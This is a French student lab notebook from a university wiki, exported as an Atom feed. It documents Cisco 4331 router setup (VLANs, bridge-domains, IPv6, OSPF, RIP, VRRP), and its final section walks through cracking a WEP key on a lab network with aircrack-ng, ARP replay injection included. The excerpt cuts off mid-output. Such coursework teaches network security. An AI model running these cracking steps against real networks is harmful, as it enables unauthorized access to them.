<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
		<id>https://projets-ima.plil.fr/mediawiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Troj</id>
		<title>Wiki de Projets IMA - Contributions de l’utilisateur [fr]</title>
		<link rel="self" type="application/atom+xml" href="https://projets-ima.plil.fr/mediawiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Troj"/>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php/Sp%C3%A9cial:Contributions/Troj"/>
		<updated>2026-05-14T09:17:59Z</updated>
		<subtitle>Contributions de l’utilisateur</subtitle>
		<generator>MediaWiki 1.29.2</generator>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=36594</id>
		<title>Cahier 2016 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=36594"/>
				<updated>2017-01-02T16:07:02Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Configuration PCBX */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Cahier des charges ==&lt;br /&gt;
=== Présentation du travail ===&lt;br /&gt;
&lt;br /&gt;
==== Répartition du travail ====&lt;br /&gt;
&lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 1 (03/10)&lt;br /&gt;
 | Recherche sur le routeur 4331. Installation de la machine virtuelle, définition de l'architecture réseau. &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 2 (10/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |- &lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 3 (13/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 4 (24/10)&lt;br /&gt;
 | Test de la configuration locale&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 5 (07/11)&lt;br /&gt;
 | Configuration OSPF - Configuration locale IPv6 - Configuration RIP - Configuration VRRP - Cassage de clé WEP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 6 (17/11 - additionnel)&lt;br /&gt;
 | Protocole HSRP - Cassage de clé WPA - Configuration DNS - Securisation de site par SSL - Securisation de DNS par DNSSEC - LVM&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 7 (28/11)&lt;br /&gt;
 | RAID5 - Cryptage de données&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 8 (additionnel - 7-8/12/2016)&lt;br /&gt;
 | Modification configuration routeur pour prise en charge Wifi - Sécurisation Wifi par WPA-EAP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 9 (12/12)&lt;br /&gt;
 | Configuration DHCP - PCBX&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance additionnelle (14/12/2016)&lt;br /&gt;
 | Configuration PCBX&lt;br /&gt;
 |-&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 1ère séance ====&lt;br /&gt;
&lt;br /&gt;
Pour cette première séance nous avons d'abord installé la machine virtuelle Xen grâce à la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=Flash --ip=193.48.57.165 --netmask=255.255.255.240 gateway=193.48.57.171 &lt;br /&gt;
--dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --passwd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous obtenons ce résultat:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Installation Summary&lt;br /&gt;
---------------------&lt;br /&gt;
Hostname        :  Flash&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:49:8F:E5&lt;br /&gt;
IP Address(es)  :  193.48.57.165 &lt;br /&gt;
RSA Fingerprint :  5c:89:1c:49:cf:d1:a0:a3:9b:ff:0c:d1:f7:33:82:db&lt;br /&gt;
Root Password   :  N/A&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Travail réalisé la 2e et 3e séance (2 séances) ====&lt;br /&gt;
Durant cette semaine, nous avons réalisés la configuration locale du routeur (configuration des VLANs). &amp;lt;br /&amp;gt;&lt;br /&gt;
Comme le 4331 est une nouvelle génération de routeur encore non utilisée en TP de PRA, nous devons apprendre comment l'utiliser.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration générale=====&lt;br /&gt;
Communication: '''Série 9800 Bauds 8 bits sans parité sans contrôle de flux'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Lors de sa première mise en route, nous devons effectuer sa configuration générale :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; hostname cisco config hostname&lt;br /&gt;
 enable secret reverse &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis ensuite, nous pouvons passer à la configuration des VALNs.&lt;br /&gt;
=====Configuration des VLANs =====&lt;br /&gt;
Nous avons 12 VLANs à configurer :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 11 VLANs (2-11) : VLAN correspondant aux différents groupes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (12) : VLAN des Machines virtuelles. Permet la communication entre Cordouan et les Commutateurs&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (13) : VLAN d'interconnexion. Permet la communication entre le routeur local et le routeur de l'école&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
Sur l'interface physique du 4331, il y a 3 interfaces:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/0 : disponible en cuivre et en fibre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/1: disponible en cuivre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/2: disponible en fibre&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons connecter notre routeur aux 2 commutateurs 6006 prévus dans l'architecture du TP. Pour cela, il faut que les 2 commutateurs aient les mêmes informations. Pour cela, nous devons créer des '''bridge-domain'''. Des bridge-domain permettent de rassembler 2 sous interfaces de 2 interfaces différentes pour qu'elles aient la même IP. L'interface principale n'aura pas d'adresse IP, les sous interfaces non plus, l'adresse IP sera placé sur le bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Exemple: '''VLAN2 : Gi 0/0/0.2 et Gi 0/0/1.2 seront dans le même bridge-domain 2'''&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les 4331 étant une nouvelle génération de routeur encore non testée à l'école, il fallait apprendre à s'en servir.&amp;lt;br /&amp;gt;&lt;br /&gt;
La plupart des commandes CISCO de base restent inchangées. Cependant, la création des sous interfaces a changée. Avant, nous devions créer des interfaces comme suit:&lt;br /&gt;
&amp;lt;pre&amp;gt; interface GigabitEthernet 0/0/0.X &amp;lt;/pre&amp;gt;&lt;br /&gt;
Avec le nouvel IOS (IOS ISR), nous ne pouvons pas créer des sous interfaces comme ci-dessus dans le but de les mettre dans un bridge.&lt;br /&gt;
Nous devons passer par une nouvelle commande qui s'appelle '''service instance''' :&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi 0/0/0&lt;br /&gt;
 service instance &amp;lt;n°VLAN&amp;gt; ethernet &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous avons la sous interface numéro 2 de l'interface principale 0/0/0.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons alors créer nous sous interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
&lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
    encapsulation dot1q 3&lt;br /&gt;
    bridge-domain 3&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nos sous interfaces sont crées et sont placés dans les différents bridge domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Configuration des bridge-domain=====&lt;br /&gt;
Afin d'allouer des IP aux différents bridge domain, il faut prévenir le routeur que nous utilisons des bridge-domain:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge irb &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous devons préciser quel protocole nous devons utiliser et si les adresses IP des bridge domain seront des adresses routées :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge 2 protocol ieee&lt;br /&gt;
 bridge 2 route ip&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, nous pouvons allouer des IP aux différents bridge domain :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;int BDI2&lt;br /&gt;
  ip address 10.60.2.1 255.255.255.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous répétons ces opérations pour tous les bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Afin de tester si notre configuration locale est correcte, nous devons racker notre routeur, le connecter à un des 6006, puis connecter le 6006 à Cordouan (groupe BONDING). Ainsi, nous pourrons voir si nous pouvons ping notre routeur depuis notre VM.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 4e séance====&lt;br /&gt;
=====Test 1=====&lt;br /&gt;
Cette semaine, nous avons testés la configuration locale de notre routeur. Nous avons donc tentés de ping le routeur depuis notre VM. &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour tester, nous avons besoin d'un port disponible sur CORDOUAN qui est dans le bridge IMA5sc.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après des essais laborieux, nous décidons donc de regarder les adresses MAC des ports afin de les rassembler. Si 4 ports ont le même radical MAC, c'est qu'ils font partis d'un groupe de 4. Nous avons donc choisis '''eth4'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, il fallait trouver le port physique correspondant a eth4. '''Grâce au fichier /etc/udev/rules.d/70-persistence-net.rules''', on peut voir l'association du port physique à l'interface. Voici l'extrait qui nous intéresse: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;# PCI device 0x14e4:0x1657 (tg3)&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:40&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth4&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:41&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth5&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:42&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth6&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:43&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth7&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
On voit bien que eth4 est dans un groupe de 4 ports, ce qui restreint nos choix. Ensuite, on sait que c'est le plus petit des 4 interfaces. Logiquement, ce sera le 1er du groupe.&amp;lt;br /&amp;gt;&lt;br /&gt;
On connecte donc ce port au commutateur sur un port qui appartient au VLAN des VM. On connecte ensuite notre routeur au commutateur via un port trunk.&amp;lt;br /&amp;gt;&lt;br /&gt;
'''Premier essai: FAIL'''&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Test 2=====&lt;br /&gt;
Et là, c'est le drame ... On ne ping rien ...&amp;lt;br /&amp;gt;&lt;br /&gt;
On se demande donc d'où cela peut venir.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Première cause possible : La configuration de CORDOUAN======&lt;br /&gt;
Peut-être que c'est CORDOUAN qui est mal configuré. On se place donc sur CORDOUAN, et grâce à la commande '''cdpr''' (Cisco Discovery Protocol Reporter), on peut demander au serveur de chercher ses voisins et d'avoir la configuration de la liaison avec ce voisin. Voici le résultat de cette commande:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cdpr -d eth4&lt;br /&gt;
cdpr - Cisco Discovery Protocol Reporter&lt;br /&gt;
Version 2.4&lt;br /&gt;
Copyright (c) 2002-2010 - MonkeyMental.com&lt;br /&gt;
&lt;br /&gt;
Using Device: eth4&lt;br /&gt;
Warning opening device (eth4: no IPv4 address assigned)&lt;br /&gt;
Waiting for CDP advertisement:&lt;br /&gt;
(default config is to transmit CDP packets every 60 seconds)&lt;br /&gt;
Device ID&lt;br /&gt;
  value:  Switch_E306&lt;br /&gt;
Addresses&lt;br /&gt;
Port ID&lt;br /&gt;
  value:  GigabitEthernet4/13&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien que CORDOUAN détecte qu'il a une liaison avec le switch qui se trouve en E306 et qu'il est connecté via le port Gi4/13.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Deuxième cause possible: Le commutateur======&lt;br /&gt;
Peut-être donc que c'est le commutateur qui est mal configuré. On se place donc sur le commutateur, et toujours grâce à la commande '''cdpr''', on peut demander au commutateur de trouver ses voisins. Le résultat de cette commande est la suivante: Le commutateur découvre bien notre routeur (cisco), et sait qu'il est connecté sur le port 4/47 (port trunk).&lt;br /&gt;
======Dernière cause possible:Le routeur======&lt;br /&gt;
On se dit donc que le problème vient du routeur...&amp;lt;br /&amp;gt;&lt;br /&gt;
On regarde donc la configuration du routeur, et Mr REDON nous demande pourquoi on n'a pas créé de VLAN. Les VLAN sont traduits par les service instance dans le nouvel IOS, mais peut-être que nous devons encore définir que les paquets venant/sortant de l'interface générale doivent être encapsulé/décapsulé en DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après quelques recherches, une première solution a été de préciser sur l'interface des bridge-domain que les paquets étaient encapsulés en DOT1Q. Solution '''peu logique''' vu que l'encapsulation est déjà faite dans les service instance.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après encore quelques recherches, une solution plausible est que '''le routeur ne sait pas qu'il faut dé-encapsuler les paquets venant d'un VLAN'''. Théoriquement, il n'enlèverait pas le tag associé à l'encapsulation DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une commande cisco à associer à TOUTES les interfaces service instance permet de préciser qu'il faut supprimer le tag associé à l'encapsulation:&lt;br /&gt;
&amp;lt;pre&amp;gt;rewrite ingress tag pop 1 symmetric&amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois cette commande appliquée à tous les services, nous pouvons effectuer un test préalable : '''Nous connectons un eeePC au commutateur via un port associé au VLAN des VM. L'eeePC serait muni d'une IP dans le réseau des VM.'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Résultat '''OK'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc tenter de ping le routeur depuis la machine virtuelle :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ping 193.48.57.171&lt;br /&gt;
PING 193.48.57.171 (193.48.57.171) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=1 ttl=255 time=0.360 ms&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=2 ttl=255 time=0.271 ms&lt;br /&gt;
^C&lt;br /&gt;
--- 193.48.57.171 ping statistics ---&lt;br /&gt;
2 packets transmitted, 2 received, 0% packet loss, time 999ms&lt;br /&gt;
rtt min/avg/max/mdev = 0.271/0.315/0.360/0.047 ms&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre configuration locale est donc maintenant achevée. Nous pouvons passer à la configuration de l'interconnexion ipv4 et ipv6 de l'école.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 5e séance====&lt;br /&gt;
=====Configuration IPv6=====&lt;br /&gt;
Nous avons donc pu commencer la configuration IPv6 de notre routeur.&amp;lt;br /&amp;gt;&lt;br /&gt;
Chaque bridge-domain aura son adresse IP dans le réseau IPv6 de l'école, avec un préfixe débutant à 2001:660:4401:60b0::/64.&amp;lt;br /&amp;gt;&lt;br /&gt;
La configuration est la suivante, pour chaque BDI:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco(config)#int BDI6                                                          &lt;br /&gt;
cisco(config-if)#ipv6 address 2001:660:4401:60b4::/64 eui-64                    &lt;br /&gt;
cisco(config-if)#ipv6 nd prefix 2001:660:4401:60b4::/64 1000 900                &lt;br /&gt;
cisco(config-if)#ipv6 nd router-preference high                                 &lt;br /&gt;
cisco(config-if)#ipv6 enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration OSPF (IPv4)=====&lt;br /&gt;
Dès notre arrivée, Mr.REDON nous a dit que, pour booster le TP, il avait effectué lui-même la configuration OSPF de notre routeur. La voici:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;router ospf 1&lt;br /&gt;
 router-id 10.60.2.1&lt;br /&gt;
 summary-address 10.60.0.0 255.255.0.0&lt;br /&gt;
 summary-address 193.48.57.160 255.255.255.240&lt;br /&gt;
 redistribute connected metric 30 subnets&lt;br /&gt;
 network 192.168.222.0 0.0.0.7 area 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration RIP (IPv6)=====&lt;br /&gt;
Le protocole RIPv6 est une stratégie de routage pour IPv6. Ce protocole est configuré pour le BDI130 (correspondant au VLAN130 d'interconnexion des routeurs de l'école). La configuration de RIP est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ipv6 router rip tpima5sc&lt;br /&gt;
 redistribute connected metric 1&lt;br /&gt;
 redistribute static metric 1&lt;br /&gt;
 redistribute rip 1 metric 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
La prise en compte du protocole RIP dans la BDI130 est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI130&lt;br /&gt;
 ip address 192.168.222.1 255.255.255.248&lt;br /&gt;
 ipv6 address 2001:660:4401:60AA::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60AA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 ipv6 rip tpima5sc enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pour confirmer notre résultat, nous regardons la table de routage IPv6:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; cisco#sh ipv6 route&lt;br /&gt;
IPv6 Routing Table - default - 65 entries&lt;br /&gt;
Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
       B - BGP, R - RIP, I1 - ISIS L1, I2 - ISIS L2&lt;br /&gt;
       IA - ISIS interarea, IS - ISIS summary, D - EIGRP, EX - EIGRP external&lt;br /&gt;
       ND - ND Default, NDp - ND Prefix, DCE - Destination, NDr - Redirect&lt;br /&gt;
       O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
       ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2, a - Application&lt;br /&gt;
R   ::/0 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre routeur détecte les routeurs de l'école, notre configuration est donc achevée.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration VRRP=====&lt;br /&gt;
Le VRRP est un protocole de redondance. Une adresse IP virtuelle (IP flottante) est montée sur 1 des 2 routeurs. Si le routeur sur laquelle est montée l'IP flottante tombe, l'IP est montée sur l'autre routeur. De plus, les machines pourront envoyer les paquets vers l'adresse IP virtuelle, et le VRRP dispatchera les paquets entre les 2 routeurs.&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration VRRP de notre routeur:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI2&lt;br /&gt;
 ip address 10.60.2.1 255.255.255.0&lt;br /&gt;
 ipv6 address 2001:660:4401:60B0::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60B0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 vrrp 1 ip 10.60.2.3&lt;br /&gt;
 vrrp 1 priority 110&amp;lt;/pre&amp;gt;&lt;br /&gt;
10.60.X.1 est l'espace des adresses IP de notre routeur (4331), 10.60.X.2 est l'espace des adresses IP du routeur 3560E, donc 10.60.X.3 est l'espace des adresses IP flottantes, X représente le numéro du BDI.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons voir si notre configuration VRRP est effective : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco#sh vrrp&lt;br /&gt;
BDI12 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 193.48.57.173&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 193.48.57.171 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&lt;br /&gt;
BDI2 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 10.60.2.1 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cependant, même si notre configuration VRRP est bonne, nous n'arrivons pas à ping 193.48.57.173, qui représente l'adresse IP virtuelle montée sur le bridge-domain des VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Craquage de clé WEP=====&lt;br /&gt;
On bascule d’abord la carte en mode monitor : &lt;br /&gt;
&amp;lt;pre&amp;gt; airmon-ng start xxxxxxxx  &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite on scan tous les réseaux wifi captés par cette même carte :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –encrypt wep wlan 0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient :&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
 CH 13 ][ Elapsed: 4 s ][ 2016-03-08 10:32                                         &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 44:AD:D9:5F:87:00  -44        2        0    0  11  54e. WEP  WEP         Wolverine                               &lt;br /&gt;
 04:DA:D2:9C:50:53  -66        2        0    0  13  54e. WEP  WEP         cracotte04                              &lt;br /&gt;
 04:DA:D2:9C:50:55  -70        2       91   35  13  54e. WEP  WEP         cracotte06                              &lt;br /&gt;
 04:DA:D2:9C:50:51  -69        4       33   13  13  54e. WEP  WEP         cracotte02                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -67        3       44   19  13  54e. WEP  WEP         cracotte08                              &lt;br /&gt;
 04:DA:D2:9C:50:56  -69        2       38   11  13  54e. WEP  WEP         cracotte07                              &lt;br /&gt;
 04:DA:D2:9C:50:54  -68        2       37   14  13  54e. WEP  WEP         cracotte05                              &lt;br /&gt;
 04:DA:D2:9C:50:58  -70        2      175   70  13  54e. WEP  WEP         cracotte09                              &lt;br /&gt;
 04:DA:D2:9C:50:50  -68        0      142   52  13  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -70        2      171   64  13  54e. WEP  WEP         cracotte03                              &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                         &lt;br /&gt;
                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 - 9e  1160       50                                                &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -62    0 -48e    34        7                                                &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -64    0 - 6e    31        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -66    0 -48e    60        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -70    0 -24e    52       11                                                &lt;br /&gt;
 04:DA:D2:9C:50:58  00:0F:B5:92:23:69  -62    0 -48e    12      140  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ici nous avons choisi cracotte06 comme wifi cible. On récupère donc son BSSID : 04 :DA :D2 :9C :50 :55 sur le channel 13&amp;lt;br /&amp;gt;&lt;br /&gt;
On surveille uniquement notre cible pour s'assurer qu'une machine s'y connecte bien :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –w out –c 13 –bssid 04 :DA :D2 :9C :50 :55 wlan0 &amp;lt;/pre&amp;gt; &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour le craquage, il faut au préalable surchargé de requête ARP le réseau cible pour récupérer un maximum de trame d’échanges.&lt;br /&gt;
&amp;lt;pre&amp;gt; aireplay-ng -3 –e cracotte06 –a 04 :DA :D2 :9C :50 :55 –b 04 :DA :D2 :9C :50 :55 –h 00:0F:B5:92:23:6B –x 1000 –n out-ox.cap wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois un nombre de trame récupéré assez conséquent, on lance l’utilitaire : &amp;lt;pre&amp;gt;aircarck-ng out_ox.cap&amp;lt;/pre&amp;gt; avec out_ox.cap le fichier de sauvegarde contenant toutes les trames ARP récupérées. &lt;br /&gt;
&lt;br /&gt;
On a alors réussi notre craquage au bout de quelque minutes :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:01] Tested 785 keys (got 1349085 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
